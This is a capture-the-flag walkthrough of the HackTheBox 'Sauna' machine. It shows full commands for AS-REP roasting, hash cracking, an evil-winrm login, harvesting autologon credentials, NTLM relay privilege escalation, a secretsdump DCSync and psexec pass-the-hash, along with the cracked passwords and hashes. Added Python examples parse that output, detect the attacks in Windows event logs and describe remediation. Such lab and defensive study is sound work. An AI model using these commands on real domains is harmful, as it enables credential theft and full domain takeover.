Summary

Because the website listed the staff members, a list of valid usernames could be generated, and with it an unprivileged foothold was obtained. The host also had legacy support enabled, which made it possible to use NTLM relaying (ntlmrelayx) to obtain privileged credentials.

Foothold

We enumerate in the usual way.

Look at the page and write the team members' names into a txt file.

Use this script to generate candidate Active Directory usernames from those names.

https://github.com/Sh4rpe/UNCreator/blob/master/README.md

Getting a User

GetNPUsers.py EGOTISTICALBANK/ -usersfile ../../../hackthebox/sauna/users.txt  -no-pass -dc-ip sauna.htb -format hashcat -outputfile fsmith.hash

hashcat -m 18200 --force -a 0 fsmith.hash ../../wordlist/rockyou.txt

$krb5asrep$23$FSmith@EGOTISTICALBANK:0bd43c2e6f733ab7df687d0e70dc037b$ebd9c1d21a76485fa5419ff349cb692699b4cc1700dfd60efdd34d2c224f7d9194a46c377ce9d9492f66426d995783e3b49c2fc857bdc278be0eb150295b767ccaaa560833b4caee4486529467a76a39b5d749cbb5a64fd63cfc67269bea4bea8f44e5fcfe3b6d615d5ff36bc378b29fc99d5f389899f0818ef145a17f8a2ba93962b07269dc3e865da6555b3a435573f96800fd80435adb5acc13748addc4270bd14389ac09bba0a5e5057e221800ae10a32723e415b8d756f99e492fbe68efe0c1d620a06af8b71364ff2eda84875daf5e5c2e809bc44e5c1298f7628f0faeb7b257d5feba44cd68f667e55169f801fc12ef01f0c3a5e7b4:Thestrokes23
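The line above is a hashcat mode 18200 record; its fields tell a reviewer which account, realm and encryption type were exposed. Below is an added example (not part of the original write-up, and not impacket or hashcat code) that parses that format and, using a constructed sample of Windows event 4768 fields, flags the TGT requests issued without pre-authentication that an AS-REP roast produces on the domain controller. The 4768 sample and the IP addresses in it are constructed for the example.

```python
import re
from typing import Optional

# hashcat mode 18200 layout (what GetNPUsers.py -format hashcat writes):
#   $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<enc-part>[:<cracked-password>]
# The trailing ":<password>" only appears once hashcat has cracked the line.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)(?::(?P<cracked>.*))?$"
)

# Kerberos encryption types. RC4-HMAC (23) is keyed directly from the NT hash, which is
# what makes the enc-part crackable at wordlist speed; AES (17/18) is far more expensive.
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}

# The line obtained above, including the cracked password hashcat appended.
PAGE_HASH = (
    "$krb5asrep$23$FSmith@EGOTISTICALBANK:0bd43c2e6f733ab7df687d0e70dc037b$ebd9c1d21a76485fa5419ff349cb692699b4cc1700dfd60efdd34d2c224f7d9194a46c377ce9d9492f66426d995783e3b49c2fc857bdc278be0eb150295b767ccaaa560833b4caee4486529467a76a39b5d749cbb5a64fd63cfc67269bea4bea8f44e5fcfe3b6d615d5ff36bc378b29fc99d5f389899f0818ef145a17f8a2ba93962b07269dc3e865da6555b3a435573f96800fd80435adb5acc13748addc4270bd14389ac09bba0a5e5057e221800ae10a32723e415b8d756f99e492fbe68efe0c1d620a06af8b71364ff2eda84875daf5e5c2e809bc44e5c1298f7628f0faeb7b257d5feba44cd68f667e55169f801fc12ef01f0c3a5e7b4:Thestrokes23"
)


def parse_asrep_line(line: str) -> Optional[dict]:
    """Split a mode-18200 line into its fields, or return None if it is not one."""
    m = ASREP_RE.match(line.strip())
    if m is None:
        return None
    etype = int(m["etype"])
    return {
        "user": m["user"],
        "realm": m["realm"],
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        "rc4": etype == 23,
        "cracked": m["cracked"] is not None,
    }


# Constructed sample of the fields event 4768 ("A Kerberos authentication ticket (TGT) was
# requested") carries. PreAuthType 0 means the KDC issued the TGT without pre-authentication,
# i.e. the account has "Do not require Kerberos preauthentication" set and the AS-REP can be
# taken offline. TicketEncryptionType 0x17 is RC4-HMAC, 0x12 is AES256.
SAMPLE_4768 = [
    {"TargetUserName": "fsmith", "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.24"},
    {"TargetUserName": "svc_loanmgr", "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.24"},
    {"TargetUserName": "SAUNA$", "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "::1"},
]


def find_roastable_requests(events):
    """Return (user, source, rc4) for every TGT issued without pre-authentication."""
    return [
        (e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"].lower() == "0x17")
        for e in events
        if e.get("PreAuthType") == "0"
    ]


def requests_per_source(events):
    """Count no-preauth TGTs per source address. GetNPUsers run over a user list produces a
    burst of them from one address, which is the pattern worth alerting on."""
    counts = {}
    for _, src, _ in find_roastable_requests(events):
        counts[src] = counts.get(src, 0) + 1
    return counts


if __name__ == "__main__":
    print(parse_asrep_line(PAGE_HASH))
    print(find_roastable_requests(SAMPLE_4768), requests_per_source(SAMPLE_4768))
```

The fix on the directory side is to clear the "Do not require Kerberos preauthentication" flag on the account (and, where a legacy client really needs it, to give that account a long random password and AES-only keys so the RC4 enc-part is never issued).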

evil-winrm -u fsmith -p Thestrokes23 -i sauna.htb 

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> 

Looking at the groups fsmith belongs to, one stands out: Pre-Windows 2000 Compatible Access.

C:\Users\FSmith\Documents> whoami /all

USER INFORMATION
----------------

User Name              SID                                            
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes                                         
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
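When reviewing a compromised account, the whoami /all output above is worth parsing rather than eyeballing. The following is an added example (not part of the original write-up) that extracts the group SIDs and privileges from that output and flags the entries a reviewer would raise: the legacy Pre-Windows 2000 Compatible Access membership, the Remote Management Users membership that made the WinRM shell possible, and SeMachineAccountPrivilege. The sample text is copied from the output above with the Mandatory Label line omitted; the finding notes are the example's own.

```python
import re

# Constructed from the whoami /all output above (fsmith's groups and privileges).
WHOAMI_OUTPUT = r"""
USER INFORMATION
----------------

User Name              SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Memberships and privileges that deserve a finding on an ordinary domain user.
# The SIDs are the well-known BUILTIN values; the notes are this example's.
RISKY_GROUPS = {
    "S-1-5-32-554": "Pre-Windows 2000 Compatible Access: legacy read access to directory "
                    "objects; verify Authenticated Users/Everyone were not added to it",
    "S-1-5-32-580": "Remote Management Users: permits WinRM logon, which is how the "
                    "foothold shell was opened",
}
RISKY_PRIVILEGES = {
    "SeMachineAccountPrivilege": "can join computers to the domain (ms-DS-MachineAccountQuota); "
                                 "consider removing it from Authenticated Users",
}

SID_RE = re.compile(r"\bS-1-[0-9-]+\b")
PRIV_RE = re.compile(r"^(?P<name>Se\w+Privilege)\s+.*?\s+(?P<state>Enabled|Disabled)\s*$")


def audit_whoami(text: str) -> dict:
    """Parse whoami /all output into groups and privileges and flag the risky ones."""
    section = None
    groups, privileges, findings = [], [], []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.endswith("INFORMATION"):
            section = stripped.split()[0]  # USER, GROUP or PRIVILEGES
            continue
        if section == "GROUP":
            m = SID_RE.search(line)
            if m:
                # The name column ends at the first run of two or more spaces.
                name = re.split(r"\s{2,}", line, maxsplit=1)[0]
                groups.append((m.group(0), name))
                if m.group(0) in RISKY_GROUPS:
                    findings.append(("group", name, RISKY_GROUPS[m.group(0)]))
        elif section == "PRIVILEGES":
            m = PRIV_RE.match(line)
            if m:
                privileges.append((m["name"], m["state"]))
                if m["state"] == "Enabled" and m["name"] in RISKY_PRIVILEGES:
                    findings.append(("privilege", m["name"], RISKY_PRIVILEGES[m["name"]]))
    return {"groups": groups, "privileges": privileges, "findings": findings}


if __name__ == "__main__":
    for kind, ident, note in audit_whoami(WHOAMI_OUTPUT)["findings"]:
        print(f"[{kind}] {ident}: {note}")
```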

Getting Root

This site has a guide for enumerating the host, and the accompanying script automates it.

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1

Running the script turns up autologon credentials stored under the Winlogon registry key:

DefaultDomainName DefaultUserName                 DefaultPassword
----------------- ------------------------------- --------------------------
EGOTISTICALBANK   EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround!
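Those three values live in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, readable by any local user, which is why an autologon password set this way is a finding on any host. The following is an added example (not part of the original write-up or the enumeration script) that parses reg query output for that key and reports whether a cleartext DefaultPassword is present without echoing the secret. The sample output is constructed to mirror the values found above; the AutoAdminLogon and Shell values in it are assumed for the sample.

```python
import re

# Constructed reg query output for the Winlogon key. The three Default* values mirror what
# the enumeration script reported; AutoAdminLogon and Shell are assumed for the sample.
WINLOGON_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!
    Shell    REG_SZ    explorer.exe
"""

# Value lines are indented: <name> <REG_type> <data>.
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")


def parse_reg_query(text: str) -> dict:
    """Turn reg query output into {value name: data}; key path lines are skipped."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m["name"]] = m["data"].rstrip()
    return values


def audit_autologon(text: str) -> dict:
    """Report the autologon configuration without leaking the password itself."""
    values = parse_reg_query(text)
    password = values.get("DefaultPassword", "")
    account = values.get("DefaultUserName", "")
    domain = values.get("DefaultDomainName", "")
    if domain and account and "\\" not in account:
        account = f"{domain}\\{account}"
    return {
        "autologon_enabled": values.get("AutoAdminLogon") == "1",
        "account": account,
        "cleartext_password": bool(password),
        # The length is enough to prove presence in a report; never copy the secret out.
        "password_length": len(password),
    }


if __name__ == "__main__":
    print(audit_autologon(WINLOGON_QUERY))
```

Remediation is to delete the DefaultPassword value and rotate that account's password; where autologon is genuinely required, the Sysinternals Autologon tool stores the password as an LSA secret instead of a plain registry string, which keeps it from ordinary users but not from local administrators.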

ntlmrelayx.py -t ldap://sauna.htb --escalate-user svc_loanmgr -domain EGOTISTICALBANK
curl -v --ntlm -u svc_loanmgr:Moneymakestheworldgoround! http://10.10.14.24/privexchange/
secretsdump.py EGOTISTICALBANK/svc_loanmgr:'Moneymakestheworldgoround!'@sauna.htb -just-dc
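secretsdump.py -just-dc pulls the domain's password hashes through the directory replication service (DCSync), which requires the replication control-access rights on the domain object, whether those were granted by ntlmrelayx's --escalate-user or were already assigned to the account. On the domain controller each such request is audited as event 4662 with the replication right GUIDs in its Properties field. Below is an added example (not part of the original write-up or impacket) that runs that check over constructed 4662 samples and reports every replicating subject that is not a domain controller account. The DC account name is taken from the hostname above; the event samples are constructed.

```python
# Control-access rights a replication request needs; they appear in the Properties field of
# event 4662 ("An operation was performed on an object") with AccessMask 0x100 (Control Access).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcb2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcb2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}

# Constructed 4662 samples: the DC's own computer account replicating normally, a user
# account issuing the same request (what secretsdump -just-dc produces), and an unrelated
# control-access operation (User-Change-Password) that must not be flagged.
SAMPLE_4662 = [
    {"SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICALBANK", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcb2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcb2}"},
    {"SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICALBANK", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcb2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcb2}"},
    {"SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICALBANK", "AccessMask": "0x100",
     "Properties": "{ab721a53-1e2f-11d0-9819-00aa0040529b}"},
]


def is_replication_request(event: dict) -> bool:
    """True when the event exercises one of the replication control-access rights."""
    if event.get("AccessMask", "").lower() != "0x100":
        return False
    props = event.get("Properties", "").lower()
    return any(guid in props for guid in REPLICATION_GUIDS)


def detect_dcsync(events, dc_accounts):
    """Return the subjects that replicated but are not in the set of DC computer accounts.

    Domain controllers replicate with each other constantly, so the allowlist is what keeps
    this quiet; anything else performing replication is a DCSync and warrants an incident.
    """
    allow = {a.upper() for a in dc_accounts}
    return [
        e["SubjectUserName"]
        for e in events
        if is_replication_request(e) and e["SubjectUserName"].upper() not in allow
    ]


if __name__ == "__main__":
    print(detect_dcsync(SAMPLE_4662, {"SAUNA$"}))
```

The allowlist should be built from the Domain Controllers OU rather than typed by hand, and the alert should also fire when a subject is an Azure AD Connect or backup account that is not expected to replicate from that source address.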

psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff' EGOTISTICALBANK/[email protected]
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
SAUNA